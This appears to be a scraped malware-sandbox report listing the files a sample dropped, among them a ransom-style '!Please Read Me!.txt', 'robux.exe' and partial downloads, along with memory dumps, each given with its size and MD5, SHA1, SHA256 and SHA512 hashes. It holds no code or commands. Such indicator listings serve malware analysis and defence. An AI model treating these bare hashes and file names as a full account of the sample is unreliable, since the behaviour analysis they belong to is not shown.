MD5
addedb06062eef1e06beb01c81ede139

SHA1
fe92bda282254358c287991cd4020f393a3393fe

SHA256
98c6a0254f64be056923053dff9619232013371b7326bd539d5e1717d7844c3f

SHA512
a892597d9fed1cf6fb34d810ac3385a0e3c2ab03ecb09434eb2252d2cedc3f11c018a0d077a670113a18dcabeddb0f50fc6eda33b7e5ae078bf99d13e8874123

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ic4vve4l.j0b.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
15KB

MD5
e917c1f3a3da55cdfee06ab145196261

SHA1
0dd3f9cb45d059ff60e0ac7a3407030aa29e45fb

SHA256
c9ce75874a85802b04b28f6b39fbfd10f555d588af2b62035d985eb930e4ddbe

SHA512
c0f5a49c40e5573605d91c3834c6d2782d2169d1da46b5e584fee1f49c4b1f42d29d7ac99f720afcc825494d048a9151c1f7cdf874f87e48b2d37385e3b7752c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
10KB

MD5
402082641388f22d69e3b4a1f1073e48

SHA1
96ee6790d681a114b359081ce5beb79e59610e13

SHA256
4c09dff8766021f8084a4aa2d16c1eb76b452ff3337245d29d0d62fc5a0596b6

SHA512
79523253dbe0db50f486c6817373b700b9faed3e156ebc42d53ea832e089314f0e67608806cbb197073673f1b8ae9e0c03a362ab44ab0b059c14345a9fa2fefa

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
11KB

MD5
48552704ccda2bf672aa61211c523ed9

SHA1
d7febdcf84bf8c650b5cc2e11242cfb06b4b127f

SHA256
38b77d4a0eaa498e766a46c28f4ac041b350b772ec189eb00db4e82e238aab11

SHA512
f572355adbc1fdddffacd1cefbcdc70ee1843987801c39ab6e3b3980993656e27246c58941fb4f8b860676d7b1266f6f64c0787cc56fff350b4ac6e306123cda

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
15KB

MD5
eaefd53812431dcbfcd339d27683e363

SHA1
e89408802bb6f7b79413e1851a2c511e0cf7ad18

SHA256
f76fb436d44364d8e54308340e48521a61333626b2be4302c5067b65003f7654

SHA512
237c2a508c9ed25cca09aad294fb31845a2e77a2b68dfd97e219494276b8b59e4aa0faaa4be837a361d4af0d070374a0e70cc87cd3ee89e8ecc54298a5d457bc

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
11KB

MD5
258af7cc469f03d6daf1d16d151ab116

SHA1
f40857fad418a61ab3c55dc29269bf8499749b01

SHA256
8390a5a5020f09e206f14b7683514b10f0b2232a5cfa06c70daa9af41acb2591

SHA512
d3ea0a99f605a2594b9cae8be90b87ffe671e83afad91666363f135f329a81e51d9d6ef7484b58c4e5dfc7494e1a4b189199a31d4276777563ca16b20ef9f177

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
11KB

MD5
74279ff6b9b48ed3314401db1b6366fb

SHA1
6589b772ec011ef18cd9dc8e32410cc762e7439f

SHA256
d7b267f0aad3623fca612b61050a1b61246f09597533d58a4c0a01d2f48bae6a

SHA512
6634555e9117fd9794e372c1e7582b45e46813965f59b12b946b2a060878a449ab7f4be3caf9a89f490e1e9620d3e00a7312d0659fff9fff59570cfa34109429

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
15KB

MD5
bd1a6fcb326e5bb77f618a5cc2955594

SHA1
ebac387bdba939a0c6370bdab479431ec3e043af

SHA256
8165500221d0c70f13fa9b42cc236fcd0679e39d864e06118c0c7ca13b64268f

SHA512
3ac0148a81020d17e3891a7c2d5097651422eb0fd2d02f622c0a0294bfee320acc40a20ffb2d8cc9e3ae9f4c8b8e1d673e7ff6df28cde7b4d5fb6b46091e8774

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
10KB

MD5
f969fe1812c6fb6dcd40fb7eb2939288

SHA1
a22778099957308a6badf45525bc035a05a01def

SHA256
9cb84ff2c777a9e202c61572f98a220f9dd9f8bc32c6c38dd20588a825c2681e

SHA512
43d56eca432bd1871b94aceb16f75017db10bcb2f306944138d67b5efc3093ba5117757f5fb36152331378a7e1aaf1b9137fbdbe5a7ea86016a52ef8ad5fe777

Download Submit
C:\Users\Admin\Downloads\!Please Read Me!.txt

Filesize
797B

MD5
afa18cf4aa2660392111763fb93a8c3d

SHA1
c219a3654a5f41ce535a09f2a188a464c3f5baf5

SHA256
227082c719fd4394c1f2311a0877d8a302c5b092bcc49f853a5cf3d2945f42b0

SHA512
4161f250d59b7d4d4a6c4f16639d66d21b2a9606de956d22ec00bedb006643fedbbb8e4cde9f6c0c977285918648314883ca91f3442d1125593bf2605f2d5c6b

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 228003.crdownload

Filesize
53KB

MD5
87ccd6f4ec0e6b706d65550f90b0e3c7

SHA1
213e6624bff6064c016b9cdc15d5365823c01f5f

SHA256
e79f164ccc75a5d5c032b4c5a96d6ad7604faffb28afe77bc29b9173fa3543e4

SHA512
a72403d462e2e2e181dbdabfcc02889f001387943571391befed491aaecba830b0869bdd4d82bca137bd4061bbbfb692871b1b4622c4a7d9f16792c60999c990

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 545732.crdownload

Filesize
856B

MD5
9b52f6b0533f05686ed29b63a12a88b3

SHA1
25cf52a9a62253bc6566946dfac5d119e70b24f3

SHA256
7dc767c9996b5bcf4ecfec32ae92a66ee7eb92d85ca8fa294872a5890adf467f

SHA512
dcf6e90c06ce2bf65141ec1e0979fae9b2f8bfe8f6d0ee88028f691045d6ca59f0fba51df78c92453abd0f5208ef925752b920f80751bfca2726f71f9ae7e97b

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 830016.crdownload

Filesize
211KB

MD5
b805db8f6a84475ef76b795b0d1ed6ae

SHA1
7711cb4873e58b7adcf2a2b047b090e78d10c75b

SHA256
f5d002bfe80b48386a6c99c41528931b7f5df736cd34094463c3f85dde0180bf

SHA512
62a2c329b43d186c4c602c5f63efc8d2657aa956f21184334263e4f6d0204d7c31f86bda6e85e65e3b99b891c1630d805b70997731c174f6081ecc367ccf9416

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 855213.crdownload

Filesize
224KB

MD5
5c7fb0927db37372da25f270708103a2

SHA1
120ed9279d85cbfa56e5b7779ffa7162074f7a29

SHA256
be22645c61949ad6a077373a7d6cd85e3fae44315632f161adc4c99d5a8e6844

SHA512
a15f97fad744ccf5f620e5aabb81f48507327b898a9aa4287051464019e0f89224c484e9691812e166471af9beaddcfc3deb2ba878658761f4800663beef7206

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 855213.crdownload:SmartScreen

Filesize
7B

MD5
4047530ecbc0170039e76fe1657bdb01

SHA1
32db7d5e662ebccdd1d71de285f907e3a1c68ac5

SHA256
82254025d1b98d60044d3aeb7c56eed7c61c07c3e30534d6e05dab9d6c326750

SHA512
8f002af3f4ed2b3dfb4ed8273318d160152da50ee4842c9f5d9915f50a3e643952494699c4258e6af993dc6e1695d0dc3db6d23f4d93c26b0bc6a20f4b4f336e

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 953131.crdownload

Filesize
89KB

MD5
86d68c9cdc087c76e48a453978b63b7c

SHA1
b8a684a8f125ceb86739ff6438d283dbafda714a

SHA256
df51babc1547a461656eaef01b873a91afcf61851b6f5ef06977e1c33e1b5f32

SHA512
dd627f071d994999172048f882ba61407461633634fdb2a3f2b8e6abff6324cc0d78682b5adc4aa4083e5baa1c981687f5c516d9e075eb00dfb58364cee1db04

Download Submit
C:\Users\Admin\Downloads\robux.exe:Zone.Identifier

Filesize
55B

MD5
0f98a5550abe0fb880568b1480c96a1c

SHA1
d2ce9f7057b201d31f79f3aee2225d89f36be07d

SHA256
2dfb5f4b33e4cf8237b732c02b1f2b1192ffe4b83114bcf821f489bbf48c6aa1

SHA512
dbc1150d831950684ab37407defac0177b7583da0fe13ee8f8eeb65e8b05d23b357722246888189b4681b97507a4262ece96a1c458c4427a9a41d8ea8d11a2f6

Download Submit
C:\Users\Admin\Downloads\u.wry

Filesize
236KB

MD5
cf1416074cd7791ab80a18f9e7e219d9

SHA1
276d2ec82c518d887a8a3608e51c56fa28716ded

SHA256
78e3f87f31688355c0f398317b2d87d803bd87ee3656c5a7c80f0561ec8606df

SHA512
0bb0843a90edacaf1407e6a7273a9fbb896701635e4d9467392b7350ad25a1bec0c1ceef36737b4af5e5841936f4891436eded0533aa3d74c9a54efa42f024c5

Download Submit
memory/1620-1814-0x0000019764780000-0x00000197647A2000-memory.dmp

Filesize
136KB

Download
memory/2064-5907-0x00000000066E0000-0x0000000006746000-memory.dmp

Filesize
408KB

Download
memory/3048-2103-0x0000000004F60000-0x0000000004FF2000-memory.dmp

Filesize
584KB

Download
memory/3048-2102-0x0000000005510000-0x0000000005AB6000-memory.dmp

Filesize
5.6MB

Download
memory/3048-2105-0x0000000005150000-0x00000000051A6000-memory.dmp

Filesize
344KB

Download
memory/3048-2104-0x0000000004EC0000-0x0000000004ECA000-memory.dmp

Filesize
40KB

Download
memory/3048-2100-0x0000000000480000-0x00000000004BC000-memory.dmp

Filesize
240KB

Download
memory/3048-2101-0x0000000004E00000-0x0000000004E9C000-memory.dmp

Filesize
624KB

Download
memory/4948-5990-0x0000000010000000-0x0000000010012000-memory.dmp

Filesize
72KB

Download